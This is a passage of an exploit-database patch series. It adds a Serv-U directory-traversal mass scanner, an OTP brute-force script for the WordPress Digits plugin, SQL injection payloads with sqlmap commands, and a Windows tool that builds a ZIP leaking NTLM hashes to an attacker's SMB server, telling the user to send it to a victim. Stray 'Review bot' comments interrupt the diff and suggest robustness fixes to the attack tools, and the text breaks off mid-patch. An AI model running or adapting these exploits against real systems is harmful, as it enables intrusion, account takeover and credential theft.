print(f"{Fore.RED}[!] 
Error loading wordlist: {e}{Style.RESET_ALL}") + return [] + +def scan_target(url, custom_payloads=None): + """Scan a target URL for the CVE-2024-28995 vulnerability.""" + url = normalize_url(url) + result = ScanResult(url) + + # Try to get server version first + try: + response = get_request(url) + if response and response.headers: + result.version = extract_server_version(response.headers) + vulnerable_version = is_vulnerable_version(result.version) + + if vulnerable_version is False: + print(f"{Fore.YELLOW}[*] {url} - Serv-U version {result.version} appears to be patched{Style.RESET_ALL}") + # Still continue scanning as version detection may not be reliable + except Exception as e: + pass + + # Get all payloads to try + payloads = get_default_payloads() + if custom_payloads: + payloads.extend(custom_payloads) + + # Try each payload + for payload in payloads: + full_url = f"{url}{payload['path']}" + try: + print(f"{Fore.BLUE}[*] Trying: {payload['name']} on {url}{Style.RESET_ALL}") + response = get_request(full_url) + + if response and response.status_code == 200: + content = response.text + + # Check if the response contains meaningful content + if len(content) > 100: # Arbitrary threshold to filter out error pages + os_type = detect_os_type(content) + if os_type: + result.is_vulnerable = True + result.os_type = os_type + result.file_content = content + result.path = payload['path'] + + print(f"{Fore.GREEN}[+] {Fore.RED}VULNERABLE: {url} - {payload['name']} - Detected {os_type} system{Style.RESET_ALL}") + + # Successful match - no need to try more payloads + return result + except Exception as e: + continue + + if not result.is_vulnerable: + print(f"{Fore.RED}[-] Not vulnerable: {url}{Style.RESET_ALL}") + + return result + +def scan_multiple_targets(targets, custom_dir=None, custom_file=None, wordlist=None): + """Scan multiple targets using thread pool.""" + results = [] + custom_payloads = [] + + # Add custom payloads if specified + if custom_dir and 
custom_file: + custom_payloads.extend(create_custom_payload(custom_dir, custom_file)) + + # Add wordlist payloads if specified + if wordlist: + custom_payloads.extend(load_wordlist(wordlist)) + + print(f"{Fore.CYAN}[*] Starting scan of {len(targets)} targets with {len(custom_payloads) + len(get_default_payloads())} payloads{Style.RESET_ALL}") + + # Use fixed thread count of 10 + with ThreadPoolExecutor(max_workers=10) as executor: + future_to_url = {executor.submit(scan_target, target, custom_payloads): target for target in targets} + + for future in as_completed(future_to_url): + try: + result = future.result() + results.append(result) + except Exception as e: + print(f"{Fore.RED}[!] Error scanning {future_to_url[future]}: {e}{Style.RESET_ALL}") + + return results + +def save_results(results, output_file): + """Save scan results to a JSON file.""" + output_data = [result.to_dict() for result in results] + + try: + with open(output_file, 'w') as f: + json.dump(output_data, f, indent=2) + print(f"{Fore.GREEN}[+] Results saved to {output_file}{Style.RESET_ALL}") + except Exception as e: + print(f"{Fore.RED}[!] 
Error saving results: {e}{Style.RESET_ALL}") + +def save_vulnerable_content(result, output_dir): + """Save the vulnerable file content to a file.""" + if not os.path.exists(output_dir): + os.makedirs(output_dir) + + # Create a safe filename from the URL + parsed_url = urlparse(result.url) + safe_filename = f"{parsed_url.netloc.replace(':', '_')}.txt" + output_path = os.path.join(output_dir, safe_filename) + + try: + with open(output_path, 'w') as f: + f.write(f"URL: {result.url}\n") + f.write(f"Path: {result.path}\n") + f.write(f"Version: {result.version or 'Unknown'}\n") + f.write(f"OS Type: {result.os_type or 'Unknown'}\n") + f.write(f"Timestamp: {result.timestamp}\n") + f.write("\n--- File Content ---\n") + f.write(result.file_content) + + print(f"{Fore.GREEN}[+] Saved vulnerable content to {output_path}{Style.RESET_ALL}") + except Exception as e: + print(f"{Fore.RED}[!] Error saving content: {e}{Style.RESET_ALL}") + +def main(): + parser = argparse.ArgumentParser(description="CVE-2024-28995 - SolarWinds Serv-U Directory Traversal Scanner") + parser.add_argument("-u", "--url", help="Target URL") + parser.add_argument("-f", "--file", help="File containing a list of URLs to scan") + parser.add_argument("-d", "--dir", help="Custom directory path to read (e.g., ProgramData/RhinoSoft/Serv-U/)") + parser.add_argument("-n", "--filename", help="Custom filename to read (e.g., Serv-U-StartupLog.txt)") + parser.add_argument("-w", "--wordlist", help="Path to wordlist containing custom paths to try") + parser.add_argument("-o", "--output", help="Output JSON file to save results") + + args = parser.parse_args() + + print_banner() + + # Validate arguments + if not args.url and not args.file: + parser.print_help() + print(f"\n{Fore.RED}[!] 
Error: Either -u/--url or -f/--file is required{Style.RESET_ALL}") + sys.exit(1) + + targets = [] + + # Get targets + if args.url: + targets.append(args.url) + + if args.file: + try: + with open(args.file, "r") as f: + targets.extend([line.strip() for line in f.readlines() if line.strip()]) + except Exception as e: + print(f"{Fore.RED}[!] Error reading file {args.file}: {e}{Style.RESET_ALL}") + sys.exit(1) + + # Deduplicate targets + targets = list(set(targets)) + + if not targets: + print(f"{Fore.RED}[!] No valid targets provided.{Style.RESET_ALL}") + sys.exit(1) + + print(f"{Fore.CYAN}[*] Loaded {len(targets)} target(s){Style.RESET_ALL}") + + # Set output file + output_file = args.output or f"cve_2024_28995_results_{time.strftime('%Y%m%d_%H%M%S')}.json" + + # Start scanning + results = scan_multiple_targets(targets, args.dir, args.filename, args.wordlist) + + # Process results + vulnerable_count = sum(1 for result in results if result.is_vulnerable) + + print(f"\n{Fore.CYAN}[*] Scan Summary:{Style.RESET_ALL}") + print(f"{Fore.CYAN}[*] Total targets: {len(results)}{Style.RESET_ALL}") + print(f"{Fore.GREEN if vulnerable_count > 0 else Fore.RED}[*] Vulnerable targets: {vulnerable_count}{Style.RESET_ALL}") + + # Save results + save_results(results, output_file) + + # Save vulnerable file contents + for result in results: + if result.is_vulnerable and result.file_content: + save_vulnerable_content(result, "vulnerable_files") + + print(f"\n{Fore.GREEN}[+] Scan completed successfully!{Style.RESET_ALL}") + +if __name__ == "__main__": + try: + main() + except KeyboardInterrupt: + print(f"\n{Fore.YELLOW}[!] Scan interrupted by user{Style.RESET_ALL}") + sys.exit(0) + except Exception as e: + print(f"\n{Fore.RED}[!] An error occurred: {e}{Style.RESET_ALL}") + sys.exit(1) \ No newline at end of file diff --git a/exploits/multiple/webapps/52307.txt b/exploits/multiple/webapps/52307.txt new file mode 100644 index 000000000..aa862ebaa --- /dev/null 
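Review bot: The version pre-check in `is_vulnerable_version` cannot recognise a patched 15.4.2 HF2 host, because `extract_server_version` captures only three numeric components (`Serv-U/(\d+\.\d+\.\d+)`) and the hotfix level never reaches the comparison, so the `appears to be patched` hint in `scan_target` is printed only for a higher patch, minor or major number; the docstring ("15.4.2 HF1 or lower") and the inline comment ("lower than 15.4.2 HF2") also disagree on the boundary. Move the `# We're assuming patch 2 ...` caveat into the docstring, e.g. `"""Return True if version is below 15.4.2 HF2, False if clearly newer, None if unknown. The Server header carries no hotfix level, so 15.4.2 HF2 is reported as vulnerable."""`. The bare `except: pass` in the same function also catches `KeyboardInterrupt` and `SystemExit`; `except ValueError:` covers the failures the `map(int, ...)` unpack can realistically raise there. Separately, the `#!/usr/bin/env python3` line sits after the comment header rather than on line 1, so it is not honoured when the file is executed directly.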
+++ b/exploits/multiple/webapps/52307.txt 
@@ -0,0 +1,74 @@
+# Exploit Title: WordPress Digits Plugin 8.4.6.1 - Authentication Bypass via OTP Bruteforcing
+# Google Dork: inurl:/wp-content/plugins/digits/
+# Date: 2025-04-30
+# Exploit Author: Saleh Tarawneh
+# Vendor Homepage: https://digits.unitedover.com/
+# Version: < 8.4.6.1
+# CVE : CVE-2025-4094
+
+"""
+The Digits plugin for WordPress prior to version 8.4.6.1 is vulnerable to OTP brute-force attacks due to missing rate limiting.
+An attacker can exploit this to bypass authentication or password reset by iterating over possible OTP values.
+
+This PoC targets the "Forgot Password" flow and automates the attack, which is the same concept that is valid for the registration flow.
+
+CWE-287: Improper Authentication
+CVSS v3.1: 9.8 (Critical)
+OWASP A2: Broken Authentication
+
+[Instructions]
+1. Use a tool like Burp Suite or your browser’s developer tools to intercept the OTP verification request.
+2. Copy the exact request parameters
+3. Replace the placeholder values in the script with real data from the intercepted request.
+4. Run the script to brute-force 4-digit OTPs (0000 to 9999) or you can change it to 6-digit.
+
+[Alternative Method – Burp Suite Pro]
+
+If you have Burp Suite Pro, you can perform the OTP brute-force attack manually:
+
+1. Intercept the OTP request using Burp Proxy.
+2. Send the request to Intruder.
+3. Mark the `sms_otp` parameter as the payload position.
+4. Load a payload list from `000000` to `999999` (for 6-digit OTPs).
+5. Start the attack and monitor responses for a different status code, length, or success message.
+
+"""
+
+import requests
+
+def brute(otp):
+ url = "https://example.com/wp-admin/admin-ajax.php"
+ data = { # Replace with targets data
+ "login_digt_countrycode": "+",
+ "digits_phone": "000000000",
+ "action_type": "phone",
+ "sms_otp": otp,
+ "otp_step_1": "1",
+ "instance_id": "xxxxxxx",
+ "action": "digits_forms_ajax",
+ "type": "forgot",
+ "forgot_pass_method": "sms_otp",
+ "digits": "1",
+ "digits_redirect_page": "//example.com/",
+ "digits_form": "xxxxxxxx",
+ "_wp_http_referer": "/?login=true"
+ }
+ headers = {
+ "User-Agent": "Mozilla/5.0",
+ "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
+ "X-Requested-With": "XMLHttpRequest",
+ "Referer": "https://example.com/?login=true" # Replace with intercepted referer
+ }
+ response = requests.post(url, data=data, headers=headers)
+ if '"success":true' in response.text:
+ print(f"[+] OTP FOUND: {otp}")
+ exit()
+
+def main():
+ for otp in range(0, 10000): # range(0, 1000000): for 6-digit
+ otp_str = f"{otp:04d}" # {otp:06d} for 6-digit
+ print(f"[*] Trying OTP: {otp_str}")
+ brute(otp_str)
+
+if __name__ == "__main__":
+ main()
\ No newline at end of file
diff --git a/exploits/multiple/webapps/52312.txt b/exploits/multiple/webapps/52312.txt
new file mode 100644
index 000000000..c3a761653
--- /dev/null
+++ b/exploits/multiple/webapps/52312.txt
@@ -0,0 +1,72 @@
+# Exploit Title: Campcodes Online Hospital Management System 1.0 - SQL Injection
+# Google Dork: N/A
+# Exploit Author: Carine Constantino
+# Vendor Homepage: https://www.campcodes.com
+# Software Link: https://www.campcodes.com/projects/online-hospital-management-system-using-php-and-mysql/
+# Version: 1.0
+# Tested on: Linux - Ubuntu Ubuntu 23.10
+# CVE: CVE-2025-5298
+
+# Campcodes Online Hospital Management System 1.0 is vulnerable to SQL Injection
+# The report in admin/betweendates-detailsreports.php does not validate ‘fromdate’ and ‘todate’ fields
+# And allows the processing of SQL Injection queries of the types:
+
+# blind time-based in the ‘fromdate’ field
+# boolean-based in the ‘todate’ field
+# Union Query in the ‘todate’ field
+
+‘fromdate’ field is vulnerable to SQL Injection on reports accessed on “/admin/betweendates-detailsreports.php” from POST request
+
+POST /HospitalManagementSystem/hospital/hms/admin/betweendates-detailsreports.php HTTP/1.1
+Host: 127.0.0.1
+User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:139.0) Gecko/20100101 Firefox/139.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate, br
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 45
+Origin: http://127.0.0.1
+Connection: keep-alive
+Referer: http://127.0.0.1/HospitalManagementSystem/hospital/hms/admin/between-dates-reports.php
+Cookie: ajs_anonymous_id=e18be7d3-2b50-4bed-9962-5cfab989426f; PHPSESSID=hfb8j1phivvf11o2j9cd492oqe
+Upgrade-Insecure-Requests: 1
+Priority: u=0, i
+
+fromdate=&todate=&submit=
+
+=======================================|| Blind Time Based - ‘fromdate’ field ||==============================================
+
+SQLMap identified the following injection payload:
+
+Parameter: fromdate (POST)
+ Type: time-based blind
+ Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+ Payload: fromdate=2019-01-01' AND (SELECT 5962 FROM (SELECT(SLEEP(5)))danz) AND 'awPP'='awPP&todate=2025-05-28&submit=
+
+SQLMap first command to confirm the vulnerability: “sqlmap -r request.txt -p fromdate --dbs --random-agent --technique=T”
+
+
+=======================================|| Boolean Based - ‘todate’ field ||==============================================
+
+‘todate’ field is vulnerable to SQL Injection on reports accessed on “/admin/betweendates-detailsreports.php” from POST request
+SQLMap identified the following injection payload:
+
+Parameter: todate (POST)
+ Type: boolean-based blind
+ Title: AND boolean-based blind - WHERE or HAVING clause
+ Payload: fromdate=2019-01-01&todate=2025-05-28' AND 3290=3290 AND 'yOfc'='yOfc&submit=
+
+SQLMap first command to confirm the vulnerability: “sqlmap -r request.txt -p todate --dbs --random-agent --technique=B”
+
+=======================================|| Union Query - ‘todate’ field ||==============================================
+
+Another technique on ‘todate’ field can be exploited
+SQLMap identified the following injection payload:
+
+Parameter: todate (POST)
+ Type: UNION query
+ Title: Generic UNION query (NULL) - 11 columns
+ Payload: fromdate=2019-01-01&todate=2025-05-28' UNION ALL SELECT CONCAT(CONCAT('qkpxq','eLwmjRlXmPYByrACqjbUDqzOqYmBeKwQSUSMNXdM'),'qzzbq'),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ckvh&submit=
+
+
+SQLMap first command to confirm the vulnerability: “sqlmap -r request.txt -p todate --dbs --random-agent --technique=U”
\ No newline at end of file
diff --git a/exploits/windows/remote/52310.py b/exploits/windows/remote/52310.py
new file mode 100755
index 000000000..cde0bf91b
--- /dev/null
+++ b/exploits/windows/remote/52310.py
@@ -0,0 +1,85 @@ +#!/usr/bin/env python3 +# Exploit Title: Windows File Explorer Windows 11 (23H2) - NTLM Hash Disclosure +# Exploit Author: Mohammed Idrees Banyamer +# Twitter/GitHub:https://github.com/mbanyamer +# Date: 2025-05-27 +# CVE: CVE-2025-24071 +# Vendor: Microsoft +# Affected Versions: Windows 10/11 (All supporting .library-ms and SMB) +# Tested on: Windows 11 (23H2) +# Type: Local / Remote (NTLM Leak) +# Platform: Windows +# Vulnerability Type: Information Disclosure +# Description: +# Windows Explorer automatically initiates an SMB authentication request when a +# .library-ms file is extracted from a ZIP archive. This causes NTLM credentials +# (in hashed format) to be leaked to a remote SMB server controlled by the attacker. +# No user interaction is required beyond extraction. + +import zipfile +from pathlib import Path +import argparse +import re +import sys +from colorama import Fore, Style + +def create_library_ms(ip: str, filename: str, output_dir: Path) -> Path: + """Creates a malicious .library-ms file pointing to an attacker's SMB server.""" + payload = f''' + + + + + \\\\{ip}\\shared + + + +''' + + output_file = output_dir / f"(unknown).library-ms" + output_file.write_text(payload, encoding="utf-8") + return output_file + +def build_zip(library_file: Path, output_zip: Path): + """Packages the .library-ms file into a ZIP archive.""" + with zipfile.ZipFile(output_zip, 'w', zipfile.ZIP_DEFLATED) as archive: + archive.write(library_file, arcname=library_file.name) + print(f"{Fore.GREEN}[+] Created ZIP: {output_zip}{Style.RESET_ALL}") + +def is_valid_ip(ip: str) -> bool: + return re.match(r"^\d{1,3}(\.\d{1,3}){3}$", ip) is not None + +def main(): + parser = argparse.ArgumentParser( + description="CVE-2025-24071 - NTLM Hash Disclosure via .library-ms ZIP Archive", + epilog="example:\n python3 CVE-2025-24071_tool.py -i 192.168.1.100 -n payload1 -o ./output_folder --keep", + formatter_class=argparse.RawTextHelpFormatter + ) + + 
parser.add_argument("-i", "--ip", required=True, help="Attacker SMB IP address (e.g., 192.168.1.100)") + parser.add_argument("-n", "--name", default="malicious", help="Base filename (default: malicious)") + parser.add_argument("-o", "--output", default="output", help="Output directory (default: ./output)") + parser.add_argument("--keep", action="store_true", help="Keep .library-ms file after ZIP creation") + + args = parser.parse_args() + + if not is_valid_ip(args.ip): + print(f"{Fore.RED}[!] Invalid IP address: {args.ip}{Style.RESET_ALL}") + sys.exit(1) + + output_dir = Path(args.output) + output_dir.mkdir(parents=True, exist_ok=True) + + print(f"{Fore.CYAN}[*] Generating malicious .library-ms file...{Style.RESET_ALL}") + library_file = create_library_ms(args.ip, args.name, output_dir) + zip_file = output_dir / f"{args.name}.zip" + build_zip(library_file, zip_file) + + if not args.keep: + library_file.unlink() + print(f"{Fore.YELLOW}[-] Removed intermediate .library-ms file{Style.RESET_ALL}") + + print(f"{Fore.MAGENTA}[!] Done. Send ZIP to victim and listen for NTLM hash on your SMB server.{Style.RESET_ALL}") + +if __name__ == "__main__": + main() \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 29175d14f..aea095c41 100644 --- a/files_exploits.csv +++ b/files_exploits.csv 
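Review bot: `is_valid_ip` only checks the dotted-quad shape, so an address such as `999.999.999.999` passes the guard in `main` and the archive is still built around it. The standard library already does the full range check: add `import ipaddress` and replace the body with `try: ipaddress.ip_address(ip); return True` / `except ValueError: return False`. `build_zip` opens `output_zip` in `'w'` mode, which silently replaces any existing archive of the same name; its docstring should say so.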
@@ -10794,6 +10794,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 46731,exploits/multiple/remote/46731.rb,"Atlassian Confluence Widget Connector Macro - Velocity Template Injection (Metasploit)",2019-04-19,Metasploit,remote,multiple,,2019-04-19,2019-04-19,1,CVE-2019-3396,Remote,,,,https://raw.githubusercontent.com/rapid7/metasploit-framework/master/modules/exploits/multi/http/confluence_widget_connector.rb 38905,exploits/multiple/remote/38905.rb,"Atlassian HipChat for Jira Plugin - Velocity Template Injection (Metasploit)",2015-12-08,Metasploit,remote,multiple,8080,2015-12-08,2015-12-08,1,CVE-2015-5603;OSVDB-126829,"Metasploit Framework (MSF)",,,,https://confluence.atlassian.com/jira/jira-and-hipchat-for-jira-plugin-security-advisory-2015-08-26-776650785.html 35898,exploits/multiple/remote/35898.php,"Atlassian JIRA 3.13.5 - File Download Security Bypass",2011-06-28,"Ignacio Garrido",remote,multiple,,2011-06-28,2015-01-26,1,,,,,,https://www.securityfocus.com/bid/48484/info +52309,exploits/multiple/remote/52309.txt,"Automic Agent 24.3.0 HF4 - Privilege Escalation",2025-05-29,"Flora Schäfer",remote,multiple,,2025-05-29,2025-05-29,0,CVE-2025-4971,,,,, 22296,exploits/multiple/remote/22296.txt,"Axis Communications HTTP Server 2.x - Messages Information Disclosure",2003-02-28,"Martin Eiszner",remote,multiple,,2003-02-28,2012-10-28,1,CVE-2003-1386;OSVDB-4806,,,,,https://www.securityfocus.com/bid/6980/info 43985,exploits/multiple/remote/43985.txt,"Axis Communications MPQT/PACS - Heap Overflow / Information Leakage",2017-11-30,bashis,remote,multiple,,2018-02-07,2018-02-07,0,,,,,,https://github.com/mcw0/PoC/blob/9a1d3d165d7b32addf6d0a9ccf86626ee7e76093/Axis_Communications_MPQT_PACS_Heap_Overflow_and_information_leakage.txt 40125,exploits/multiple/remote/40125.py,"Axis Communications MPQT/PACS 5.20.x - Server-Side Include Daemon Remote Format 
String",2016-07-19,bashis,remote,multiple,,2016-07-19,2018-02-07,0,,,,,,https://github.com/mcw0/PoC/blob/53a2d49c1e4076e8559bb937f790e724fc52ca1d/axis-ssid-PoC.py @@ -10936,6 +10937,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 28210,exploits/multiple/remote/28210.txt,"FLV Players 8 - 'popup.php?url' Cross-Site Scripting",2006-07-12,xzerox,remote,multiple,,2006-07-12,2013-09-11,1,CVE-2006-3624;OSVDB-28644,,,,,https://www.securityfocus.com/bid/18954/info 36013,exploits/multiple/remote/36013.txt,"foomatic-gui python-foomatic 0.7.9.4 - 'pysmb.py' Arbitrary Shell Command Execution",2011-08-03,daveb,remote,multiple,,2011-08-03,2015-02-07,1,,,,,,https://www.securityfocus.com/bid/48982/info 39222,exploits/multiple/remote/39222.txt,"Foreman Smart-Proxy - Remote Command Injection",2014-06-05,"Lukas Zapletal",remote,multiple,,2014-06-05,2016-01-11,1,CVE-2014-0007;OSVDB-108277,,,,,https://www.securityfocus.com/bid/68117/info +52308,exploits/multiple/remote/52308.py,"Fortra GoAnywhere MFT 7.4.1 - Authentication Bypass",2025-05-29,İbrahimsql,remote,multiple,,2025-05-29,2025-05-29,0,CVE-2024-0204,,,,, 23707,exploits/multiple/remote/23707.txt,"Freeform Interactive Purge 1.4.7/Purge Jihad 2.0.1 Game Client - Remote Buffer Overflow",2004-02-16,"Luigi Auriemma",remote,multiple,,2004-02-16,2012-12-31,1,CVE-2004-0290;OSVDB-3982,,,,,https://www.securityfocus.com/bid/9671/info 29873,exploits/multiple/remote/29873.php,"FreePBX 2.2 - SIP Packet Multiple HTML Injection Vulnerabilities",2007-04-20,XenoMuta,remote,multiple,,2007-04-20,2013-11-28,1,CVE-2007-2191;OSVDB-35315,,,,,https://www.securityfocus.com/bid/23575/info 47698,exploits/multiple/remote/47698.rb,"FreeSWITCH - Event Socket Command Execution (Metasploit)",2019-11-20,Metasploit,remote,multiple,,2019-11-20,2019-11-20,1,,"Metasploit Framework (MSF)",,,,https://raw.githubusercontent.com/rapid7/metasploit-framework/master/modules/exploits/multi/misc/freeswitch_event_socket_cmd_exec.rb 
@@ -11532,6 +11534,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 27931,exploits/multiple/remote/27931.txt,"Snort 2.4.x - URIContent Rules Detection Evasion",2006-05-31,"Blake Hartstein",remote,multiple,,2006-05-31,2013-08-29,1,CVE-2006-2769;OSVDB-25837,,,,,https://www.securityfocus.com/bid/18200/info 21029,exploits/multiple/remote/21029.pl,"Softek MailMarshal 4 / Trend Micro ScanMail 1.0 - SMTP Attachment Protection Bypass",2001-07-25,"Aidan O'Kelly",remote,multiple,,2001-07-25,2012-09-03,1,OSVDB-88584;OSVDB-88583,,,,,https://www.securityfocus.com/bid/3097/info 16324,exploits/multiple/remote/16324.rb,"Solaris Sadmind - Command Execution (Metasploit)",2010-06-22,Metasploit,remote,multiple,,2010-06-22,2016-10-27,1,CVE-2003-0722;OSVDB-4585,"Metasploit Framework (MSF)",,,, +52311,exploits/multiple/remote/52311.py,"SolarWinds Serv-U 15.4.2 HF1 - Directory Traversal",2025-05-29,İbrahimsql,remote,multiple,,2025-05-29,2025-05-29,0,CVE-2024-28995,,,,, 36537,exploits/multiple/remote/36537.txt,"SonicWALL AntiSpam & EMail 7.3.1 - Multiple Vulnerabilities",2012-01-10,"Benjamin Kunz Mejri",remote,multiple,,2012-01-10,2016-12-18,1,,,,,,https://www.securityfocus.com/bid/51337/info 31756,exploits/multiple/remote/31756.txt,"SonicWALL Email Security 6.1.1 - Error Page Cross-Site Scripting",2008-05-08,"Deniz Cevik",remote,multiple,,2008-05-08,2014-02-19,1,CVE-2008-2162;OSVDB-45017,,,,,https://www.securityfocus.com/bid/29107/info 24322,exploits/multiple/remote/24322.rb,"SonicWALL Gms 6 - Arbitrary File Upload (Metasploit)",2013-01-24,Metasploit,remote,multiple,,2013-01-24,2013-01-24,1,CVE-2013-1359;OSVDB-89347,"Metasploit Framework (MSF)",,,, 
@@ -11836,6 +11839,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 48145,exploits/multiple/webapps/48145.py,"Cacti 1.2.8 - Unauthenticated Remote Code Execution",2020-02-03,Askar,webapps,multiple,,2020-02-27,2020-02-27,0,CVE-2020-8813,,,,,https://github.com/mhaskar/CVE-2020-8813/blob/dfb48378f39249ff54ecf24ccd3b89db26971ccf/Cacti-preauth-rce.py
 52067,exploits/multiple/webapps/52067.txt,"Calibre-web 0.6.21 - Stored XSS",2024-08-23,"Catalin Iovita_ Alexandru Postolache",webapps,multiple,,2024-08-23,2024-08-23,0,,,,,,
 18430,exploits/multiple/webapps/18430.txt,"Campaign Enterprise 11.0.421 - SQL Injection",2012-01-30,"Craig Freyman",webapps,multiple,,2012-01-30,2012-01-30,0,OSVDB-78888,,,,,
+52312,exploits/multiple/webapps/52312.txt,"Campcodes Online Hospital Management System 1.0 - SQL Injection",2025-05-29,"Carine Constantino",webapps,multiple,,2025-05-29,2025-05-29,0,CVE-2025-5298,,,,,
 18247,exploits/multiple/webapps/18247.txt,"Capexweb 1.1 - SQL Injection",2011-12-16,"D1rt3 Dud3",webapps,multiple,,2011-12-16,2011-12-16,1,OSVDB-77998;CVE-2011-5031,,,,,
 50792,exploits/multiple/webapps/50792.go,"Casdoor 1.13.0 - SQL Injection (Unauthenticated)",2022-02-28,"Mayank Deshmukh",webapps,multiple,,2022-02-28,2022-02-28,0,CVE-2022-24124,,,,,
 48553,exploits/multiple/webapps/48553.txt,"Cayin Content Management Server 11.0 - Remote Command Injection (root)",2020-06-04,LiquidWorm,webapps,multiple,,2020-06-04,2020-06-04,0,,,,,,
@@ -12504,6 +12508,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 52248,exploits/multiple/webapps/52248.txt,"WooCommerce Customers Manager 29.4 - Post-Authenticated SQL Injection",2025-04-16,"Ivan Spiridonov",webapps,multiple,,2025-04-16,2025-04-16,0,CVE-2024-0399,,,,,
 47690,exploits/multiple/webapps/47690.md,"WordPress Core < 5.2.3 - Viewing Unauthenticated/Password/Private Posts",2019-10-14,"Sebastian Neef",webapps,multiple,,2019-11-19,2019-11-19,0,CVE-2019-17671,,,,,https://0day.work/proof-of-concept-for-wordpress-5-2-3-viewing-unauthenticated-posts/
 52285,exploits/multiple/webapps/52285.py,"WordPress Depicter Plugin 3.6.1 - SQL Injection",2025-05-09,"Andrew Long",webapps,multiple,,2025-05-09,2025-05-09,0,CVE-2025-2011,,,,,https://github.com/datagoboom/CVE-2025-2011
+52307,exploits/multiple/webapps/52307.txt,"WordPress Digits Plugin 8.4.6.1 - Authentication Bypass via OTP Bruteforcing",2025-05-29,"Saleh Tarawneh",webapps,multiple,,2025-05-29,2025-05-29,0,CVE-2025-4094,,,,,
 52291,exploits/multiple/webapps/52291.py,"WordPress Frontend Login and Registration Blocks Plugin 1.0.7 - Privilege Escalation",2025-05-13,"Md Shoriful Islam",webapps,multiple,,2025-05-13,2025-05-13,0,CVE-2025-3605,,,,,
 49189,exploits/multiple/webapps/49189.txt,"Wordpress Plugin Canto 1.3.0 - Blind SSRF (Unauthenticated)",2020-12-04,"Pankaj Verma",webapps,multiple,,2020-12-04,2020-12-04,0,CVE-2020-28976;CVE-2020-28977;CVE-2020-28978,,,,,
 48919,exploits/multiple/webapps/48919.txt,"WordPress Plugin Colorbox Lightbox v1.1.1 - Persistent Cross-Site Scripting (Authenticated)",2020-10-20,n1x_,webapps,multiple,,2020-10-20,2020-10-20,0,,,,,,
@@ -45941,6 +45946,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 16335,exploits/windows/remote/16335.rb,"WinComLPD 3.0.2 - Remote Buffer Overflow (Metasploit)",2010-06-22,Metasploit,remote,windows,,2010-06-22,2011-03-06,1,CVE-2008-5159;OSVDB-42861,"Metasploit Framework (MSF)",,,,
 51575,exploits/windows/remote/51575.txt,"Windows 10 v21H1 - HTTP Protocol Stack Remote Code Execution",2023-07-07,nu11secur1ty,remote,windows,,2023-07-07,2023-07-07,0,CVE-2022-21907,,,,,
 52300,exploits/windows/remote/52300.py,"Windows 2024.15 - Unauthenticated Desktop Screenshot Capture",2025-05-25,"Chokri Hammedi",remote,windows,,2025-05-25,2025-05-25,0,CVE-n/a,,,,,
+52310,exploits/windows/remote/52310.py,"Windows File Explorer Windows 11 (23H2) - NTLM Hash Disclosure",2025-05-29,"Mohammed Idrees Banyamer",remote,windows,,2025-05-29,2025-05-29,0,CVE-2025-24071,,,,,
 30169,exploits/windows/remote/30169.txt,"WindowsPT 1.2 - User ID Key Spoofing",2007-06-11,nnposter,remote,windows,,2007-06-11,2013-12-10,1,CVE-2007-3201;OSVDB-41727,,,,,https://www.securityfocus.com/bid/24412/info
 16529,exploits/windows/remote/16529.rb,"WinDVD7 - 'IASystemInfo.dll' ActiveX Control Buffer Overflow (Metasploit)",2010-05-09,Metasploit,remote,windows,,2010-05-09,2011-03-10,1,CVE-2007-0348;OSVDB-34315,"Metasploit Framework (MSF)",,,,
 7875,exploits/windows/remote/7875.pl,"WinFTP Server 2.3.0 - 'LIST' (Authenticated) Remote Buffer Overflow",2009-01-26,"joe walko",remote,windows,21,2009-01-25,2016-09-27,1,OSVDB-51667;CVE-2009-0351,,,,,
From 2825165fedb56ce9947b8f220126f85194d972b4 Mon Sep 17 00:00:00 2001
From: Exploit-DB
Date: Fri, 6 Jun 2025 00:16:28 +0000
Subject: [PATCH 6/6] DB: 2025-06-06

7 changes to exploits/shellcodes/ghdb

macOS LaunchDaemon iOS 17.2 - Privilege Escalation
ABB Cylon Aspect 3.08.04 DeploySource - Remote Code Execution (RCE)
Apache Tomcat 10.1.39 - Denial of Service (DoS)
Grandstream GSD3710 1.0.11.13 - Stack Overflow
CloudClassroom PHP Project 1.0 - SQL Injection
Microsoft Windows Server 2025 JScript Engine - Remote Code Execution (RCE)
---
 exploits/macos/local/52316.py | 100 ++++++++++++++++++++
 exploits/multiple/remote/52313.py | 110 ++++++++++++++++++++++
 exploits/multiple/remote/52317.txt | 97 +++++++++++++++++++
 exploits/multiple/remote/52318.py | 143 +++++++++++++++++++++++++++++
 exploits/php/webapps/52314.txt | 22 +++++
 exploits/windows/remote/52315.py | 108 ++++++++++++++++++++++
 files_exploits.csv | 6 ++
 7 files changed, 586 insertions(+)
 create mode 100755 exploits/macos/local/52316.py
 create mode 100755 exploits/multiple/remote/52313.py
 create mode 100644 exploits/multiple/remote/52317.txt
 create mode 100755 exploits/multiple/remote/52318.py
 create mode 100644 exploits/php/webapps/52314.txt
 create mode 100755 exploits/windows/remote/52315.py

diff --git a/exploits/macos/local/52316.py b/exploits/macos/local/52316.py
new file mode 100755
index 000000000..ef9b42ecf
--- /dev/null
+++ b/exploits/macos/local/52316.py
